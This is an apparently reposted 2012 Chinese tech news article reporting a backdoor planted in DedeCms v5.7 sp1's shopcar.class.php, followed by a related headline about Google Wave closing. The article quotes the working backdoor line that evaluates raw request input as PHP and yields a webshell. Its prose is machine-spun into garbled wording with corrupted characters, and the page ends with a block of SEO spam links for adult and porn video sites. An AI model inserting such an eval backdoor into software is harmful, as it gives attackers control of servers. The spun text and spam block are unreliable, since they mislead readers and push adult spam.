傳織夢CMS系統被植入后門 網站控制權恐遭竊取

作者:Lgo100 來源:未知 2012-03-22 11:37:03 閱讀 我要評論 直達商品

  DoNews 3月22日動靜 據動靜人士對DoNews透露,PHP開源網站打點系統織夢CMS(DedeCms)v5.7 sp1版本被植入后門,黑客可經由過程此后門直接獲得網站的節制權限,獲取存儲在處事器尚?罾υ?件和數據庫。

  據悉,織夢CMS(Dedecms)v5.7 sp1版本的中的shopcar。class。php文件被植入一句后門代碼“@eval(file_get_contents(‘php://input’));”。經由過程操作該后門,黑客只需機關簡單的數據包提交各處事器,就能獲取到該網站的WebShell,經由過程對處事器進一步滲入抨擊襲擊,進而獲取處事器的最高權限。

織夢CMS裂痕示意圖

  另據CMS官方數據顯示,今朝約有70萬網站使用該系統搭建,涉及企業、政府機關、媒體機構、行業及小我網站等。(完)


  推薦閱讀

  谷歌Wave將于4月30日關閉 提醒用戶導出數據

DoNews 3月22日動靜 3月22日,谷歌公司向旗下Wave用戶發送郵件,奉告用戶Wave處事將于2012年4月30日封鎖,提醒用戶盡早將主要數據年夜Wave賬戶中導出。 郵件暗示,谷歌Wave將于2012年4月30日封鎖,用戶可在封鎖前繼續>>>詳細閱讀


本文標題:傳織夢CMS系統被植入后門 網站控制權恐遭竊取

地址:http://www.sdlzkt.com/a/xie/20120322/43183.html

頂一下

樂購科技部分新聞及文章轉載自互聯網,供讀者交流和學習,若有涉及作者版權等問題請及時與我們聯系,以便更正、刪除或按規定辦理。感謝所有提供資訊的網站,歡迎各類媒體與樂購科技進行文章共享合作。

網友點評
我的評論: 人參與評論
驗證碼: 匿名回答
網友評論(點擊查看更多條評論)
友情提示: 登錄后發表評論,可以直接從評論中的用戶名進入您的個人空間,讓更多網友認識您。
自媒體專欄

評論

熱度

主站蜘蛛池模板: 国产成人AV区一区二区三| 成人小视频免费在线观看| 久久久久亚洲av成人网| 亚洲国产成人99精品激情在线| 国产成人19禁在线观看| 久久成人国产精品一区二区 | 成人无码av一区二区| 国产成人精品A视频一区| 1000部国产成人免费视频| 国产精品成人va在线观看| 亚洲成人免费在线观看| 日韩国产成人无码AV毛片| 国产成人www免费人成看片| 欧洲成人午夜精品无码区久久| 国产亚洲欧美成人久久片| 日韩国产欧美成人一区二区影院| 四虎成人免费影院网址| 成人精品视频一区二区三区尤物 | 成人免费视频69| 久久久久成人精品无码| 国产成人av免费观看| 成人免费公开视频| 成人超污免费网站在线看| 久久久久亚洲av成人网| 亚洲欧美日韩成人高清在线一区| 成人中文精品3d动漫在线| 久久久久av综合网成人| 亚洲欧美一区二区成人片| 国产成人亚洲精品大帝| 国产成人艳妇aa视频在线| 成人看片黄在线观看| 成人毛片18女人毛片免费| 最新国产午夜精品视频成人| 中文国产成人精品久久一区| 亚洲国产成人久久综合碰 | 国产成人综合亚洲| 成人妇女免费播放久久久| 成人毛片无码一区二区三区| 欧美成成人免费| 成人性生交大片免费看| 国产成人综合亚洲一区|